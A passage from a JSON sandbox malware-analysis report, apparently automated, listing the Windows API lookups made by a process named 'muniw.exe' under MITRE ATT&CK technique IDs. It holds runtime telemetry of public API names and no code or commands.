\"GetProcAddress\" with a parameter InvalidateRect (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter IntersectRect (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter InsertMenuItemW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter InsertMenuW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter InflateRect (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetWindowThreadProcessId (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetWindowTextW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetWindowRect (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetWindowPlacement (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetWindowLongW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetWindowDC (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetUpdateRect (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetTopWindow (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetSystemMetrics (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetSystemMenu (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetSysColorBrush (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetSysColor (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetSubMenu (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetScrollRange (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetScrollPos (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetScrollInfo (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetPropW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetParent (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetWindow (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetMessagePos (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetMessageExtraInfo (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetMenuStringW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetMenuState (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetMenuItemInfoW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetMenuItemID (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetMenuItemCount (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetMenu (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetLastActivePopup (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetKeyboardState (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetKeyboardLayoutNameW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetKeyboardLayoutList (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetKeyboardLayout (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetKeyState (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetKeyNameTextW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetIconInfo (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetForegroundWindow (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetFocus (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetDlgItem (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetDesktopWindow (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetDCEx (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetDC (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetCursorPos (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetCursor (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetClipboardData (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetClientRect (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetClassLongW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetClassInfoW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetCapture (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetActiveWindow (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter FrameRect (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter FindWindowExW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter FindWindowW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter FillRect (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter EnumWindows (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter EnumThreadWindows (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter EnumChildWindows (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter EndPaint (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter EnableWindow (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter EnableScrollBar (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter EnableMenuItem (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter DrawTextExW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter DrawTextW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter DrawMenuBar (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter DrawIconEx (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter DrawIcon (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter DrawFrameControl (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter DrawFocusRect (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter DrawEdge (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter DispatchMessageA (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter DispatchMessageW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter DestroyWindow (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter DestroyMenu (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter DestroyIcon (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter DestroyCursor (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter DeleteMenu (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter DefWindowProcW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter DefMDIChildProcW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter DefFrameProcW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter CreatePopupMenu (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter CreateMenu (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter CreateIcon (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter CreateAcceleratorTableW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter CopyIcon (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter ClientToScreen (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter CheckMenuItem (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter CharUpperBuffW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter CharNextW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter CharLowerBuffW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter CharLowerW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter CallWindowProcW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter CallNextHookEx (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter BeginPaint (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter AdjustWindowRectEx (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter ActivateKeyboardLayout (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter MessageBoxA (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter VerQueryValueW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetFileVersionInfoSizeW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetFileVersionInfoW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter OpenPrinterW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter EnumPrintersW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter DocumentPropertiesW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter ClosePrinter (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetDefaultPrinterW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetThreadPreferredUILanguages (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SetThreadPreferredUILanguages (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetThreadUILanguage (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceExW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter VariantChangeTypeEx (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter VarNeg (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter VarNot (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter VarAdd (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter VarSub (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter VarMul (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter VarDiv (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter VarIdiv (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter VarMod (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter VarAnd (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter VarOr (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter VarXor (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter VarCmp (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter VarI4FromStr (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter VarR4FromStr (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter VarR8FromStr (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter VarDateFromStr (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter VarCyFromStr (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter VarBoolFromStr (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter VarBstrFromCy (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter VarBstrFromDate (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter VarBstrFromBool (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter WINNLSEnableIME (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter ImmGetConversionStatus (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter ImmSetConversionStatus (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter ImmSetOpenStatus (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionWindow (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter ImmIsIME (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetMonitorInfoA (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter EnumDisplayMonitors (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter DwmIsCompositionEnabled (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetLayout (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GdiRealizationInfo (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter FontIsLinked (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetTextFaceAliasW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetFontAssocStatus (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GdiIsMetaPrintDC (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter AnimateWindow (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter UninitializeFlatSB (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter FlatSB_GetScrollProp (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter FlatSB_EnableScrollBar (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter FlatSB_ShowScrollBar (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter FlatSB_GetScrollRange (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter FlatSB_SetScrollRange (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SetLayeredWindowAttributes (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetFileSizeEx (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter CoCreateInstanceEx (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter CoAddRefServerProcess (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter CoReleaseServerProcess (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter CoResumeClassObjects (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter CoSuspendClassObjects (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter OpenThemeData (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter CloseThemeData (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter DrawThemeBackground (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter DrawThemeText (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetThemeBackgroundContentRect (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetThemeBackgroundExtent (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetThemePartSize (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetThemeTextExtent (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetThemeTextMetrics (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetThemeBackgroundRegion (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter HitTestThemeBackground (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter DrawThemeEdge (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter DrawThemeIcon (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter IsThemePartDefined (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter IsThemeBackgroundPartiallyTransparent (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetThemeColor (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetThemeMetric (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetThemeString (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetThemeBool (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetThemeInt (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetThemeEnumValue (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetThemePosition (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetThemeFont (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetThemeRect (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetThemeMargins (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetThemeIntList (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetThemePropertyOrigin (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SetWindowTheme (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetThemeFilename (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetThemeSysColor (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetThemeSysColorBrush (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetThemeSysBool (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetThemeSysSize (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetThemeSysFont (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetThemeSysString (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetThemeSysInt (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter IsThemeActive (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter IsAppThemed (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetWindowTheme (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter EnableThemeDialogTexture (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter IsThemeDialogTextureEnabled (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetThemeAppProperties (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SetThemeAppProperties (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetCurrentThemeName (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetThemeDocumentationProperty (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter DrawThemeParentBackground (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter EnableTheming (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter DrawThemeTextEx (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter HIMAGELIST_QueryInterface (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter DrawShadowText (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter DrawSizeBox (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter DrawScrollBar (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SizeBoxHwnd (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter ScrollBar_MouseMove (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter ScrollBar_Menu (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter HandleScrollCmd (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter DetachScrollBars (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter AttachScrollBars (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter CCSetScrollInfo (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter CCGetScrollInfo (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter CCEnableScrollBar (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter QuerySystemGestureStatus (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter RegisterClassNameW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter RegisterDragDrop (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter WSAStartup (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetAddrInfoW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetNameInfoW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter FreeAddrInfoW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter InetPtonW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter InetNtopW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetAddrInfoExW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SetAddrInfoExW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter FreeAddrInfoExW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter WSASetSocketPeerTargetName (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter WSADeleteSocketPeerTargetName (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter WSAImpersonateSocketPeer (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter WSAQuerySocketSecurity (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter WSARevertImpersonation (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter MonitorFromWindow (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter CoRegisterInitializeSpy (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter CoRevokeInitializeSpy (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter ImmLockIMC (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter ImmUnlockIMC (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter Heap32ListFirst (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter Heap32ListNext (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter Heap32First (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter Heap32Next (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter Toolhelp32ReadProcessMemory (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter Process32First (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter Process32Next (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter Process32FirstW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter Process32NextW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter Thread32First (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter Thread32Next (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter Module32First (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter Module32Next (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter Module32FirstW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter Module32NextW (UID: 00000000-00001844)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00000568)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SaferCloseLevel (UID: 00000000-00000568)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00000568)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"1300140054f44377@RPCRT4.dll\"\n \"0d000e00844b6d69@iphlpapi.dll\"\n \"0f001000dc4b6d69@iphlpapi.dll\"\n \"0c000d00244c6d69@iphlpapi.dll\"\n \"140015006c4c6d69@iphlpapi.dll\"\n \"0c000d00e04c6d69@iphlpapi.dll\"\n \"15001600c03e6d69@ADVAPI32.dll\"\n \"0e000f00703f6d69@ADVAPI32.dll\"\n \"0e000f00cc3f6d69@ADVAPI32.dll\"\n \"11001200b4476d69@ADVAPI32.dll\"\n \"1100120048486d69@ADVAPI32.dll\"\n \"120013008c486d69@ADVAPI32.dll\"\n \"12001300e4486d69@ADVAPI32.dll\"\n \"14001500386e6d69@ADVAPI32.dll\"\n \"14001500506e6d69@ADVAPI32.dll\"\n \"14001500686e6d69@ADVAPI32.dll\"\n \"17001800806e6d69@ADVAPI32.dll\"\n \"0d000e00986e6d69@ADVAPI32.dll\"\n \"11001200a86e6d69@ADVAPI32.dll\"\n \"11001200bc6e6d69@ADVAPI32.dll\"\n \"0d000e0034496d69@SHELL32.dll\"\n \"0d000e00b0496d69@SHELL32.dll\"\n \"0f001000fc6f6d69@ADVAPI32.dll\"\n \"140015003c706d69@ADVAPI32.dll\"\n \"1400150054706d69@ADVAPI32.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a 